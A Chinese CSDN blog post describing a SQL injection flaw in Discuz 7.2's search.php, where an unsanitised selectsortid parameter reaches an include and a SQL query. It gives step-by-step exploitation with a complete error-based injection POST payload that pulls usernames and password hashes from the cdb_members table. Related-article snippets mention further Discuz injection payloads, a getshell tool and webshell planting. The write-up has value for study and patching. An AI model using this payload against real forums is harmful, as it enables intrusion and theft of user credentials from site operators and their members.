php discuzSQL注入_Discuz 7.2 /search.php SQL注入漏洞

最新推荐文章于 2023-05-12 10:07:05 发布
最新推荐文章于 2023-05-12 10:07:05 发布
阅读量353 收藏
点赞数
文章标签: php discuzSQL注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_35494876/article/details/115092336
版权

在文件/include/search_sort.inc.php150行

@include_once DISCUZ_ROOT.'./forumdata/cache/threadsort_'.$selectsortid.'.php';

这个$selectsortid变量没有做过任何处理,而且最后进入到了170行的SQL语句

$query = $db->query("SELECT tid FROM {$tablepre}optionvalue$selectsortid ".($sqlsrch ? 'WHERE '.$sqlsrch : '')."");

导致了SQL注入的产生

漏洞利用过程

1.登陆论坛

2.访问

http://xxxx.com/search.php

post数据:

formhash=1&srchtype=threadsort&st=on&sortid=3&searchsubmit=true&selectsortid=3 where tid =1 and (select 1 from (select count(*),concat((select (select (select concat(username,0x3a,password) from cdb_members limit 1) ) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23&srcchtxt=aaa

1.png

loading-bars.svg

lsgn
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ipb search.php漏洞分析及思考
03-03
本文将对ipb search.php漏洞进行分析。
Discuz7.2版的faq.php SQL注入漏洞分析
10-25
主要介绍了Discuz7.2版的faq.php SQL注入漏洞分析,包含注入代码和源码分析,需要的朋友可以参考下
php discuzSQL注入_discuzphp防止sql注入函数
weixin_35020639的博客
03-08 93
最近在做一个主题投票网站,客户懂一些程序方面的东西。有特别要求需要过滤一些字符防止sql注入。本来这方面就没有特别的研究过。呵呵,又发扬了一回拿来主义。把discuz论坛的sql注入函数取了来!复制代码 代码如下:$magic_quotes_gpc = get_magic_quotes_gpc();@extract(daddslashes($_COOKIE));@extract(daddslas...
php discuzSQL注入_Discuz7.2版的faq.php SQL注入漏洞分析
weixin_39866867的博客
03-08 129
这篇文章主要介绍了Discuz7.2版的faq.php SQL注入漏洞分析,包含注入代码和源码分析,需要的朋友可以参考下注入代码实例://www.jb51.net/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=) and (select 1 from (select count(*),concat((select ...
漏洞复现-DiscuzX 系列全版本后台SQL注入漏洞
qq_59350385的博客
05-10 1519
目录 环境搭建 (1)源码下载: 漏洞检测 报错注入 写文件 漏洞分析 环境搭建 (1)源码下载: https://search.gitee.com/?skin=rec&type=repository&q=discuz git clonehttp://htts://gite.com/ComsenzDiscuzX.git 放置于web根目录,访问即可进入安装页面 (2)也可搭建vulhub靶场,启动discuz环境 漏洞检测 http://.....
Discuz开源论坛_v3.1系列_Sql注入漏洞详解
最新发布
weixin_60708754的博客
05-12 1158
Discuz v3.1系列版本 Sql注入全流程详解
Python写的Discuz7.2版faq.php注入漏洞工具
12-25
Discuz 7.2 faq.php全自动利用工具,getshell 以及dump数据,python 版的uc_key getshell部分的代码来自网上(感谢作者) 实现代码: #!/usr/bin/env python # -*- coding: gbk -*- # -*- coding: gb2312 -*- # -*- ...
discuz7.2注入漏洞faq.php
01-08
复现discuz7.2注入漏洞
discuz的php防止sql注入函数
12-17
有特别要求需要过滤一些字符防止sql注入。本来这方面就没有特别的研究过。呵呵,又发扬了一回拿来主义。把discuz论坛的sql注入函数取了来! 复制代码 代码如下: $magic_quotes_gpc = get_magic_quotes_gpc(); @...
/plus/search.php sql注入漏洞,vBulletin 4.0.x => 4.1.2 (search.php)SQL注入漏洞
weixin_32514497的博客
03-19 440
====================================================================#vBulletin 4.0.x => 4.1.2 (search.php) SQL Injection Vulnerability#=============================================================...
discuz防SQL注入
05-18
防止sql注入,使用的时候,在一个总的配置文件里用这段代码.
dede search.php 漏洞,dedecms injection 0day:company/search.php宽字符漏洞 -电脑资料
weixin_39899776的博客
04-01 96
author:冰的原点fromhttp://www.0kee.com零客网络安全小组说明:利用和分析请见黑手0812期文章,嘿嘿这里只发代码了!漏洞文件发生在:company/search.php第13行起:$areaid = intval($areaid);$areaid2 = intval($areaid2);$sectorid = intval($sectorid);$sectorid2 =...
discuz论坛注入木马
小刚的博客
06-20 4619
今天试了一下很牛逼的一套流程 对discuz论坛挂马,利用菜刀上传webshell,并反向shell获取控制权,最后更改文件权限。 虽然是我看众多视频学来的,但很多知识还是挺有用的,今天就结合一下,搞一波我的虚拟机。 实验环境: VM搭建的虚拟测试环境 1.centos7安装的discuzs3.3论坛http://10.10.10.64/upload/forum.php 2.kali 10.10....
discuz 7.2 SQL 注入漏洞分析
weixin_33860722的博客
01-28 601
2019独角兽企业重金招聘Python工程师标准>>> ...
discuz my.php注入,Discuz! 7.2 插件/manyou/sources/notice.php sql注入漏洞
weixin_35044481的博客
03-26 130
在最新的discuz! 7.2中自带了一个新的应用程序插件manyou。恰恰在这个新插件中,没有对传入的参数进行检查,在GPC为off的情况下,导致注入漏洞的产生。/manyou/sources/notice.phpif($option == 'del') {$appid = intval($_GET['appid']);$db->query("DELETE FROM {$tablepre}...
discuz7.2sql注入漏洞
weixin_40709439的博客
09-20 8304
今天尝试了discuz7.2动力论坛的sql注入漏洞 原因是由faq.php文件源码存在漏洞引起的 下载官方discuz7.2源码,在本地搭建漏洞环境 http://www.comsenz.com/downloads/install/discuz 下载的三个文件 利用http://localhost:8088/discuz72/upload/install/index.php进行安装...
Discuz!NT 3.0 SQL注入漏洞
天水飞翔的blog
02-05 2238
 发表下本人进行漏洞挖掘的首篇原创文章: 对Discuz nT3.0进行了分析,发现spacemanage.aspx页面存在一个注入漏洞,该页面位置:dnt3_src/dnt3/Discuz.Web/space/Admin代码如下: public void BindData() { DataGrid1.AllowCustomPagin
discuz hook 对应php 代码,Discuz ML V3.x 代码注入漏洞详细分析
weixin_35437039的博客
03-18 307
0x00 前言7月11号Discuz ML被爆出存在任意代码注入漏洞,Discuz在国内的用户量还是很可观的,国外还没有去关注,从官方下载源码对漏洞的原理详细的分析了一下,源码地址(http://discuz.ml/download)0x01 POCGET / HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64...
Discuz!ML V3.X 代码注入漏洞
selecthch的博客
08-16 917
官网下载:http://discuz.ml/download 版本:Discuz! ML v.3.4 解压后将upload所有内容放到网站目录,访问一步步安装即可。 本次以论坛的主页面(index.php),作为漏洞的演示: 利用Burpsuite抓包分析,漏洞点存在于cookie的xxx_language字符串,如下图箭头 构造请求参数 代码被成功执行,phpinfo显示...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值